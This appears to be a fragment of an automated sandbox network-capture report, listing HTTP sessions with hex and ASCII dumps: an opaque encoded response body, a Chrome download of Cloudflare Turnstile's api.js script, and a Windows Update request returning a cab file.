                                                                2024-08-27 18:11:30 UTC1369INData Raw: 70 4a 51 78 32 69 43 4b 30 71 33 37 57 6a 5a 4f 50 44 62 4e 73 59 53 36 57 64 66 56 49 61 50 69 4f 72 7a 4e 68 62 65 49 74 41 39 58 4f 62 4e 66 32 65 52 31 77 54 37 4e 5a 6a 75 36 5c 2f 38 45 61 6c 78 62 79 66 45 55 4d 68 36 65 6a 71 6a 4f 5c 2f 4d 30 50 36 72 5c 2f 31 66 63 5a 4a 78 5a 75 48 2b 6d 4f 74 52 4d 79 4d 47 64 68 54 68 6f 6a 69 73 72 38 54 35 6f 4a 69 4e 44 65 75 62 51 70 68 67 71 4e 4c 54 34 61 54 41 55 31 45 37 6a 39 62 46 35 53 64 4b 37 46 73 36 5c 2f 69 31 42 6d 43 57 4e 64 61 68 71 58 6d 5a 4b 41 5a 59 4e 5a 37 30 58 5a 63 62 6d 36 56 52 62 4e 74 50 56 42 6c 2b 44 35 74 73 30 6d 41 62 64 69 39 55 42 6d 47 74 6d 35 45 57 32 65 53 45 54 51 53 58 42 75 55 67 57 45 65 74 4e 4c 46 61 4c 58 6d 51 56 39 30 43 72 76 6f 6a 72 6e 6d 71 37 67 78 43
                                                                Data Ascii: pJQx2iCK0q37WjZOPDbNsYS6WdfVIaPiOrzNhbeItA9XObNf2eR1wT7NZju6\/8EalxbyfEUMh6ejqjO\/M0P6r\/1fcZJxZuH+mOtRMyMGdhThojisr8T5oJiNDeubQphgqNLT4aTAU1E7j9bF5SdK7Fs6\/i1BmCWNdahqXmZKAZYNZ70XZcbm6VRbNtPVBl+D5ts0mAbdi9UBmGtm5EW2eSETQSXBuUgWEetNLFaLXmQV90Crvojrnmq7gxC
                                                                2024-08-27 18:11:30 UTC1369INData Raw: 77 36 2b 4b 34 7a 57 2b 52 33 77 4a 46 73 34 4d 4d 63 4e 30 63 33 71 56 53 70 42 41 75 44 7a 36 4f 63 5a 5c 2f 47 4c 4f 37 54 67 7a 64 61 5a 59 65 34 53 6b 48 65 72 53 58 56 48 61 56 34 76 63 6a 6b 56 2b 63 59 50 47 72 68 57 2b 42 7a 5a 45 58 6c 71 64 7a 64 48 54 55 5c 2f 6e 72 66 68 2b 62 4b 70 46 36 78 62 72 6d 49 4f 2b 56 67 41 4e 5a 6c 67 72 65 43 51 57 66 50 67 44 4c 50 43 49 76 75 32 78 61 48 4c 2b 4b 63 66 4b 32 53 49 67 43 34 77 51 63 6f 78 35 2b 45 52 46 4a 72 35 4e 77 77 6f 30 41 77 34 39 41 6d 4f 66 52 42 33 38 54 72 4b 76 43 32 51 76 37 68 66 6a 77 2b 48 50 65 4b 4e 71 31 6a 62 57 70 4b 61 58 56 47 4f 48 55 59 55 79 67 79 72 4c 59 6b 6a 42 6c 5a 6e 55 52 5c 2f 73 63 35 6a 67 72 5a 33 66 6e 4d 36 6c 44 51 30 55 37 54 50 78 34 51 71 4b 45 6e 59
                                                                Data Ascii: w6+K4zW+R3wJFs4MMcN0c3qVSpBAuDz6OcZ\/GLO7TgzdaZYe4SkHerSXVHaV4vcjkV+cYPGrhW+BzZEXlqdzdHTU\/nrfh+bKpF6xbrmIO+VgANZlgreCQWfPgDLPCIvu2xaHL+KcfK2SIgC4wQcox5+ERFJr5Nwwo0Aw49AmOfRB38TrKvC2Qv7hfjw+HPeKNq1jbWpKaXVGOHUYUygyrLYkjBlZnUR\/sc5jgrZ3fnM6lDQ0U7TPx4QqKEnY
                                                                2024-08-27 18:11:30 UTC1369INData Raw: 4b 2b 39 6f 33 4c 74 4b 72 39 2b 71 48 32 6e 35 34 43 53 48 6b 66 49 6b 74 71 75 63 65 4d 49 47 47 33 57 44 6f 42 71 33 61 41 72 48 74 44 48 51 6d 50 51 71 6b 4d 38 6b 62 7a 34 79 37 59 62 38 79 61 35 46 56 7a 4c 73 45 43 74 4e 5c 2f 44 49 56 4f 75 66 4f 70 59 4c 48 4c 5a 41 64 64 63 32 64 4b 43 42 47 4d 4f 62 59 53 4b 32 49 5a 67 66 42 4d 6b 44 59 5c 2f 49 49 4a 65 48 68 46 68 48 69 57 5c 2f 5a 39 32 53 54 55 45 38 37 61 73 6c 48 39 63 4d 30 5a 4a 48 42 49 68 5c 2f 79 48 30 44 62 76 46 68 67 50 36 65 4d 5a 54 45 65 57 51 50 7a 48 38 61 42 65 4e 34 6a 4e 77 43 36 30 50 50 70 6d 74 62 73 71 4e 72 59 50 42 71 70 48 6f 72 5a 30 6b 48 50 38 2b 4c 4d 32 39 36 36 72 79 30 47 6c 57 6c 64 6c 4f 43 71 55 33 6e 58 4a 45 4c 33 57 4a 65 52 50 66 34 4a 55 64 72 6e 4e
                                                                Data Ascii: K+9o3LtKr9+qH2n54CSHkfIktquceMIGG3WDoBq3aArHtDHQmPQqkM8kbz4y7Yb8ya5FVzLsECtN\/DIVOufOpYLHLZAddc2dKCBGMObYSK2IZgfBMkDY\/IIJeHhFhHiW\/Z92STUE87aslH9cM0ZJHBIh\/yH0DbvFhgP6eMZTEeWQPzH8aBeN4jNwC60PPpmtbsqNrYPBqpHorZ0kHP8+LM2966ry0GlWldlOCqU3nXJEL3WJeRPf4JUdrnN
                                                                2024-08-27 18:11:30 UTC1369INData Raw: 55 5c 2f 4f 56 64 35 34 4d 5c 2f 77 58 48 71 37 56 37 43 42 6c 75 31 5c 2f 33 51 52 59 54 34 41 50 4d 55 51 61 4d 4b 67 62 75 70 37 57 5c 2f 39 48 75 55 58 2b 6b 61 54 52 6f 43 42 6d 31 4d 43 4d 6e 44 56 31 4c 41 4c 67 72 33 58 75 67 59 79 30 44 38 37 59 5c 2f 4f 6b 4c 32 68 5c 2f 4d 4c 59 79 49 6b 33 4e 59 33 6d 55 72 74 58 55 41 2b 64 47 6c 37 78 31 61 70 48 33 4e 50 50 5c 2f 69 53 70 47 65 57 45 49 68 5c 2f 49 64 63 35 79 77 37 6d 73 39 7a 6c 5a 75 54 6b 48 33 4f 67 4f 33 59 76 4a 37 63 31 5a 4d 44 73 51 63 46 6d 31 56 6b 68 6d 75 44 6d 4d 33 61 4c 68 59 68 4d 71 77 68 4e 42 2b 6a 6d 5a 73 34 37 69 68 69 50 78 36 78 48 6a 48 34 4f 42 73 78 6d 63 39 43 39 36 47 47 69 2b 51 44 79 64 4a 30 65 4e 4a 69 6b 41 49 33 2b 6e 6e 74 74 65 71 51 71 6d 58 38 52 64
                                                                Data Ascii: U\/OVd54M\/wXHq7V7CBlu1\/3QRYT4APMUQaMKgbup7W\/9HuUX+kaTRoCBm1MCMnDV1LALgr3XugYy0D87Y\/OkL2h\/MLYyIk3NY3mUrtXUA+dGl7x1apH3NPP\/iSpGeWEIh\/Idc5yw7ms9zlZuTkH3OgO3YvJ7c1ZMDsQcFm1VkhmuDmM3aLhYhMqwhNB+jmZs47ihiPx6xHjH4OBsxmc9C96GGi+QDydJ0eNJikAI3+nntteqQqmX8Rd
                                                                2024-08-27 18:11:30 UTC1369INData Raw: 38 32 32 50 73 5c 2f 61 58 68 4c 42 33 4e 7a 35 41 53 68 46 4e 43 70 78 5c 2f 68 39 38 6d 46 4c 73 78 39 46 67 4f 44 5c 2f 67 52 43 38 73 35 57 73 4b 6d 61 75 44 5a 6a 55 5a 59 5a 58 46 38 42 6a 4a 4c 6b 69 30 76 52 78 6b 5c 2f 49 63 5a 72 70 31 4b 37 37 71 74 35 7a 57 4e 4b 34 49 66 38 32 69 4c 38 4b 78 35 4a 5a 6a 49 51 78 32 4e 69 62 6c 51 47 4f 48 43 2b 58 4f 37 69 57 74 42 4d 67 4d 4b 57 38 4f 50 65 64 69 5c 2f 53 33 4d 39 6f 37 67 4c 59 75 43 61 43 48 67 6b 6c 65 51 4e 5c 2f 2b 78 73 36 78 46 34 52 71 48 46 6b 4c 4e 51 4d 4f 4a 52 6c 4b 73 78 6c 75 4c 4a 6e 34 69 34 39 64 62 68 6c 6f 54 56 6c 5a 34 34 48 49 56 64 49 38 4c 42 42 5a 59 43 53 61 70 4d 33 31 6c 63 36 6d 45 6f 78 30 72 58 31 65 72 61 41 52 53 7a 6a 67 4c 44 41 59 79 68 49 4c 53 52 70 64
                                                                Data Ascii: 822Ps\/aXhLB3Nz5AShFNCpx\/h98mFLsx9FgOD\/gRC8s5WsKmauDZjUZYZXF8BjJLki0vRxk\/IcZrp1K77qt5zWNK4If82iL8Kx5JZjIQx2NiblQGOHC+XO7iWtBMgMKW8OPedi\/S3M9o7gLYuCaCHgkleQN\/+xs6xF4RqHFkLNQMOJRlKsxluLJn4i49dbhloTVlZ44HIVdI8LBBZYCSapM31lc6mEox0rX1eraARSzjgLDAYyhILSRpd
                                                                2024-08-27 18:11:30 UTC1369INData Raw: 4b 6a 74 77 34 6f 78 50 6f 42 6e 4c 5c 2f 61 5c 2f 30 76 4a 54 5c 2f 6d 34 70 46 76 70 31 6e 37 45 63 37 54 50 47 41 47 6c 46 69 47 35 64 75 44 5a 6a 42 5a 69 42 34 6a 41 77 6e 38 4d 36 38 4b 51 79 44 6e 4a 63 4b 54 64 74 71 31 56 64 64 5c 2f 35 30 66 62 57 34 54 48 30 41 4b 37 77 4d 63 4b 78 58 74 57 59 4c 4d 48 41 51 55 61 49 32 41 4b 6b 50 53 6f 69 31 70 2b 4a 51 31 66 2b 72 43 57 56 6d 44 30 4e 4e 56 33 72 57 38 59 71 32 5a 34 4b 70 52 69 49 51 6d 55 45 73 41 6f 46 78 66 6e 6a 7a 67 48 64 37 63 30 52 45 6a 47 2b 46 2b 43 43 4b 6b 41 65 4e 37 77 73 41 4a 39 72 57 78 4d 6f 52 41 5c 2f 48 4d 50 6c 76 50 4f 4c 54 57 66 36 78 5a 59 37 62 62 42 6a 48 6e 58 4b 57 5c 2f 33 79 53 57 4a 63 7a 48 6c 48 56 61 64 5c 2f 76 43 54 53 51 76 35 56 4a 4f 51 52 6f 42 75
                                                                Data Ascii: Kjtw4oxPoBnL\/a\/0vJT\/m4pFvp1n7Ec7TPGAGlFiG5duDZjBZiB4jAwn8M68KQyDnJcKTdtq1Vdd\/50fbW4TH0AK7wMcKxXtWYLMHAQUaI2AKkPSoi1p+JQ1f+rCWVmD0NNV3rW8Yq2Z4KpRiIQmUEsAoFxfnjzgHd7c0REjG+F+CCKkAeN7wsAJ9rWxMoRA\/HMPlvPOLTWf6xZY7bbBjHnXKW\/3ySWJczHlHVad\/vCTSQv5VJOQRoBu


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.549738104.18.94.414436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:28 UTC383OUTGET /turnstile/v0/b/6790c32b9fc9/api.js HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:28 UTC471INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:28 GMT
                                                                Content-Type: application/javascript; charset=UTF-8
                                                                Content-Length: 45035
                                                                Connection: close
                                                                accept-ranges: bytes
                                                                last-modified: Thu, 15 Aug 2024 16:28:23 GMT
                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                access-control-allow-origin: *
                                                                cross-origin-resource-policy: cross-origin
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e0636887c6a59-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:11:28 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 53 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 5f 3d 65 5b 75 5d 28 67 29 2c 70 3d 5f 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 61 28 66 29 3b 72 65 74 75 72 6e 7d 5f 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                Data Ascii: "use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);funct
                                                                2024-08-27 18:11:28 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 5f 72 28 65 2c 72 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 24 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                Data Ascii: e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function $e(e,r){return r=r!=nu
                                                                2024-08-27 18:11:28 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 4a 65 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 43 74 28 65 29 7c 7c 4e 74 28 65 2c 72 29 7c 7c 4c 74 28 65 2c 72 29 7c 7c 6b 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 4e 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                Data Ascii: ray$/.test(a))return Je(e,r)}}function be(e,r){return Ct(e)||Nt(e,r)||Lt(e,r)||kt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ne(e,r){var a={label:0,sent:function(){if(u[0
                                                                2024-08-27 18:11:28 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 46 74 3d 33 30 30 30 32 30 3b 76 61 72 20 6b 65 3d 33 30 30 30 33 30 3b 76 61 72 20 4c 65 3d 33 30 30 30 33 31 3b 76 61 72 20 42 3b 28 66 75
                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ft=300020;var ke=300030;var Le=300031;var B;(fu
                                                                2024-08-27 18:11:28 UTC1369INData Raw: 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 75 65 7c 7c 28 75 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6c 65 3b 28 66 75 6e
                                                                Data Ascii: e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ue||(ue={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var le;(fun
                                                                2024-08-27 18:11:28 UTC1369INData Raw: 76 61 72 20 59 3d 22 30 2f 30 22 3b 66 75 6e 63 74 69 6f 6e 20 66 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64
                                                                Data Ascii: var Y="0/0";function ft(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="d
                                                                2024-08-27 18:11:28 UTC1369INData Raw: 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 63 2c 75 3d 4c 28 78 72 2c 28 63 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 67 2c 5f 3d 4c 28 77 72 2c 28 67 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 67 21 3d 3d 76 6f 69 64 20 30 3f 67 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6f 26 26 75 3f 22
                                                                Data Ascii: HAVING_TROUBLES,c,u=L(xr,(c=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&c!==void 0?c:"nonexistent"),g,_=L(wr,(g=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&g!==void 0?g:"nonexistent");return o&&u?"
                                                                2024-08-27 18:11:28 UTC1369INData Raw: 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 61 29 7d 2c 73 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 74 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 50 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 5a 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29
                                                                Data Ascii: __proto__||Object.getPrototypeOf(a)},se(e)}function Zt(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function Pe(e){var r=typeof Map=="function"?new Map:void 0;return Pe=function(o){if(o===null||!Zt(o))return o;if(typeof o!="function")
                                                                2024-08-27 18:11:28 UTC1369INData Raw: 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 61 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 50 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 61 72 28 29 7b 76 61 72 20 65 3d 67 74 28 29 3b 65 7c 7c 76 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34
                                                                Data Ascii: riptElement)&&e.test(r.src))return r;for(var a=document.querySelectorAll("script"),o=0,c;c=a[o];o++)if(P(c,HTMLScriptElement)&&e.test(c.src))return c}function ar(){var e=gt();e||v("Could not find Turnstile script tag, some features may not be available",4
                                                                2024-08-27 18:11:28 UTC1369INData Raw: 28 22 61 6c 6c 6f 77 22 2c 22 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 69 73 6f 6c 61 74 65 64 3b 20 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 61 6e 64 62 6f 78 22 2c 22 61 6c 6c 6f 77 2d 73 61 6d 65 2d 6f 72 69 67 69 6e 20 61 6c 6c 6f 77 2d 73 63 72 69 70 74 73 20 61 6c 6c 6f 77 2d 70 6f 70 75 70 73 20 61 6c 6c 6f 77 2d 66 6f 72 6d 73 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 63 72 6f 6c 6c 69 6e 67 22 2c 22 6e 6f 22 29 2c 66 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 30 70 78 22 2c 66 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64
                                                                Data Ascii: ("allow","cross-origin-isolated; fullscreen"),f.setAttribute("sandbox","allow-same-origin allow-scripts allow-popups allow-forms"),f.setAttribute("scrolling","no"),f.style.borderWidth="0px",f.style.width="100%",f.style.height="100%",f.style.overflow="hidd


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.54973440.68.123.157443
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:28 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FnM5CyNXVMxGvGD&MD=7xYbZndX HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                Host: slscr.update.microsoft.com
                                                                2024-08-27 18:11:28 UTC560INHTTP/1.1 200 OK
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Content-Type: application/octet-stream
                                                                Expires: -1
                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                MS-CorrelationId: 3428457c-e775-45c8-a5f7-5b4f180e2f33
                                                                MS-RequestId: 3b0d23b0-3f57-4621-a159-db5aa842ef41
                                                                MS-CV: 8TQKQ+GNdUatTEJk.0
                                                                X-Microsoft-SLSClientCache: 2880
                                                                Content-Disposition: attachment; filename=environment.cab
                                                                X-Content-Type-Options: nosniff
                                                                Date: Tue, 27 Aug 2024 18:11:27 GMT
                                                                Connection: close
                                                                Content-Length: 24490
                                                                2024-08-27 18:11:28 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
